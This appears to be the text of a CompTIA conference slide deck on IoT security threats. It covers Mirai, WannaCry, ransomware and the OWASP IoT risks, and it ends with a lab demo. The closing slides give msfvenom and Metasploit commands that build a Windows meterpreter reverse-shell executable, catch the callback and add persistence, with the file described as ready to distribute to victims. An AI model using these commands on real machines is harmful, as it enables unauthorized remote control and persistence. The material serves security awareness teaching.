Protecting your Organisation from the Internet of Evil Things

Protecting your Organisation from the
Internet of Evil Things

Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
The Voice of the World’s IT Industry and over 1.5 million IT Professionals
✓ Higher Salaries
✓ Growing Demand
✓ Verified Strengths
✓ Universal Skills
“Three of the ‘Top 10
Certifications That Help IT
Workers Get Jobs’ are CompTIA
certifications.”*
CERTIFICATIONS
Largest Provider of Vendor-
Neutral IT Certifications
A non-profit trade association with
more than 4,000 members and
business partners. Our members
drive our programs through their
participation in CompTIA
communities, research studies,
events, sharing of best practices and
more.
ASSOCIATION
4,000+ IT Channel
Providers & Partners
A 501(c)(3) charitable organization
that creates on-ramps for successful
IT careers, serving individuals who
are underrepresented in IT and
lacking in opportunities to be
successful in IT, including veterans,
youth, and the unemployed.
PHILANTHROPY
Creating IT Futures
Foundation
Our advocacy division encourages
collaboration and advancing of
legislation that allows the private
sector to develop new products and
services, find solutions and sell
them in the global marketplace.
ADVOCACY
Public Policy & Reform
* Source: The Dice Report, February 2012

Zeshan Sattar
From Cybernetics to Cybersecurity
3
2004
• BSc Cybernetics & Virtual Worlds
• IT Support Tech, UK & Japan
2007
• Systems Administrator
• Technical Trainer, Europe
2013
• IT Expert Consultant, Worldwide
• Head of Curriculum
2015
• Certification Evangelist

Agenda
▪ Introduction
▪ What is IoT?
▪ What is IoET?
▪ Examples of Cyber attacks
▪ Human error
▪ CompTIA certifications
▪ Guided Demo : Compromising a Windows client
4

What is the
Internet of
Things?
The Internet of things (IoT)
is the inter-networking of
physical devices, vehicles
(also referred to as
"connected devices" and
"smart devices”)
Which simply means…
6

Everything Has Become Connected
7
Smart Car
Smart Suit Smart House Tablet
Smart Phone
Desktop/Laptop
Smart Shoes
Internet CCTV
Smart Watch
Smart Cities
The Internet

What is the Internet of Things?
▪ The main problem is that because the idea of networking appliances and
other objects is relatively new, security has not always been considered in
product design.
▪ Consumers often fail to change the default passwords on smart devices or if
they do change them, fail to select sufficiently strong passwords.
8

The Concerns
▪ 70% of the most commonly used IoT devices contain vulnerabilities involving password security,
permissions and encryption
▪ A number of IoT devices available today have defaulted to the lowest hanging fruit for security &
authentication: passwords. Passwords are bad and a disaster for the web & IoT, for many reasons.
▪ Application-level security:
–Default admin passwords
–Weak passwords
–Not using encryption over the network
–Open ports.
▪ Protocol-level security:
–Wireless protocols such as ZigBee & Bluetooth
10

The Internet of Evil Things
11

What is the Internet of Evil Things?
▪ It is the Internet of Things but used in a negative way to hurt you.
▪ By detecting vulnerabilities, they can control your:
– Car, house, phone, computer
– Your identity can be stolen, You can be killed, You can be blackmailed
– You can end up in jail because of an attack that took place while you were
asleep
13

Examples of IoT devices
14

The accessible IoT devices
15

The Problems?
▪ Limited CPU on devices
▪ Encryption & identity keys
▪ New devices with new
OS/software
▪ Too much network traffic
▪ Wi-Fi connected home
appliances
▪ GUI & Internet Browsers
▪ Hardware Trojans
16

Cyber Attack Examples
17

What is Mirai?
▪ Mirai is the Japanese word for Future.
▪ In IT, it is a Malware that attacks out-of-date Linux devices remotely
▪ It controls the devices and turn them into a botnet for further attacks
▪ It scans the internet looking for IP addresses of IoT devices.
▪ Some of the popular website affected were: GitHub, Twitter, Reddit,
Netflix, Airbnb
▪ BASHLITE is another malware that performs a DDoS Attack on Linux
Systems
19

More about Mirai
▪ On the 21st of October 2016. Mirai-fueled zombie botnet army was
deployed on Dyn.
▪ Dyn is one of the world’s largest DNS providers
▪ The attack resulted in taking down internet access in many of America’s
largest cities.
▪ Mirai gave us a view on how the IoT can turn into an IoET by controlling
many devices and maybe shutting them down
20

Mirai – one year on…
▪ 66% of IT Pros said they either haven’t checked or don’t know how to
check their devices for Mirai
▪ 20% said their IoT devices were hit with ransomware attacks last year.
▪ 16% of respondents say they experienced man-in-the-middle attacks
through IoT devices.
▪ 23% of IT security professionals monitor connected devices coming into
their offices
22
Source: Pwnie Express

The Onion Routing (TOR)
▪ Onion routing is a technique for anonymous communication over a
computer network. In an onion network, messages are encapsulated in
layers of encryption, analogous to layers of an onion. ... When the final layer
is decrypted, the message arrives at its destination.
▪ Tor aims to conceal its users' identities and their online activity from
surveillance and traffic analysis by separating identification and routing.
▪ It is an implementation of onion routing, which encrypts and then randomly
bounces communications through a network of relays run by volunteers
around the globe
23

Ransomware

Steps to Ransomware
25
Infected file or Email link to a page User redirected to Site File Downloaded to the system
File InstalledUser Data EncryptedPay or Pay

WannaCry
▪ WannaCry Ransomware
▪ One of the worst spread malware
▪ Developed by the NSA “Eternal Blue”
▪ Supposedly weaponized by North Korea
▪ This Ransomware is still spreading
26

Top 10 IoT Vulnerabilities
1. Insecure Web Interface
2. Insufficient Authentication/Authorization
3. Insecure Network Services
4. Lack of Transport Encryption/Integrity Verification
5. Privacy Concerns
6. Insecure Cloud Interface
7. Insecure Mobile Interface
8. Insufficient Security Configurability
9. Insecure Software/Firmware
10. Poor Physical Security
27
Source: OWASP

Shodan.io
28

Some Dangerous Apps
29
▪ Flashlight
▪ Tinder
▪ Snapchat
▪ Blendr
▪ Whisper
▪ Yik Yak
▪ Poof
▪ Omegle
▪ Clean it
▪ Deep Clean
▪ Flappy Cat
▪ Light VPN
▪ DU battery Saver & Fast Charge
www
▪ Lazy Listen audiobook
▪ Kik Messenger
▪ Whatsapp Bomber
▪ Quick Pic
▪ ES File Explorer
▪ UC Browser
▪ Dolphin Web Browser
▪ Clean Master
▪ Whale Camera
▪ Blinking Camera
▪ File Master
▪ Art Camera

Sample Malware / Virus Codes available on GitHub
(for Research)
30
Ransomware
Code
Worm
Code
Virus
Code
Mirai
Slice Code
Batch File
Code
DoS
Code

How would a HACKER use IoT against you?
31

Hacking Steps
32
Covering Tracks
Maintaining Access
Gaining Access
Scanning
Reconnaissance
To protect against a hacker, you have to think like a hacker

How would a HACKER use IoT against you?
▪ Blackmail
– What Happened?
▪ Identity Theft / 419 Scam
– Why do they need it?
▪ Phishing
– What info are they looking for?
▪ Health Reports
– What do they do with it?
33

Quick Tip
34

The Solutions?
▪ IoT Security means opens new gates for security professionals to develop security
solutions
▪ Network Security:
– How many devices transfer unencrypted data?
– What are these devices?
– Which are most active?
▪ User Security:
– Do you need that software?
– Is it trustable?
– Is it from the vendor?
35

IoT attacks in different sectors
20.5 20
10.2
20
40.5 40.4
20.8
60
80
60 60
90.3
0
10
20
30
40
50
60
70
80
90
100
Consumer Commercial Medical Security Issues
IoT
2010 2015 2020
38
Billions

Top 5 Reasons for IoT attacks
40
1 Low security awareness
2 WeakPasswordSecurity
3 Carelesshandlingofdata
4 Inadequatesoftwaresecurity
5 Ineffectivedataaccessmanagement

End User awareness is critical
41

Ensuring our IT Professionals
are equipped with the right
skills

• A+, Network+, Security+, Linux+, CSA+DoS
• A+, Network+, Linux+, Security+, CASPAndroid
• A+, Network+, Server+, Security+, Linux+SQL Injection
• Network+, Security+, CASP, Linux+Wi-Fi
• A+, Network+, Security+, CSA+, CASP, Linux+Virus Attacks

Guided Demo of an
Attack
▪ How can you simulate this at home?
– Virtualization Software (Hyper-V, VMWare Player, Virtual Box)
– Kali Linux
– Windows client
– Tip: set up a Windows Server VM to provide DHCP to the virtual
network and use an isolated VM network
The attack performed here is for Demonstration, Awareness and Educational
purposes. Performing the same is at your own Risk.

Commands to the demo (1/3)
▪ On the Kali Linux VM, open a terminal window and type the following
command:
msfvenom -p windows/meterpreter/reverse_tcp
LHOST=192.168.2.10 LPORT=4444 -f exe > exploit.exe
▪ This command creates the exploit.exe and stores it in the Home folder ready
for you to distribute to the victims (USB, email, web link etc.)
▪ The IP address is of your Kali VM
▪ Then launch Metasploit by typing the following command:
msfconsole
45

▪ Now, we will configure the Kali VM to listen for the user to launch the
exploit, by typing:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.10
set LPORT 4444
exploit -j –z
▪ Your Kali VM is now ready for the attack to happen. On your Windows client,
double click the exploit.exe
▪ You will notice that the Kali VM receives the connection
46

▪ We can now interact with the connecting machine by typing:
sessions -i 1
▪ We want to ensure that if the user logs off/restarts the machine, we can
reconnect. This can be done by adding persistence:
run persistence -U -i 5 p 4444 r 192.168.2.10
▪ We now have full control of the system and can carry out various commands.
The commands that you can use, can be viewed by typing:
Help
▪ Enjoy hacking!
47

Thank you for your time!
Zeshan Sattar
Let’s connect!
Twitter: @zeshandotcom
LinkedIn: https://www.linkedin.com/in/zeshandotcom/
49

Protecting your Organisation from the Internet of Evil Things

More Related Content

Protecting your Organisation from the Internet of Evil Things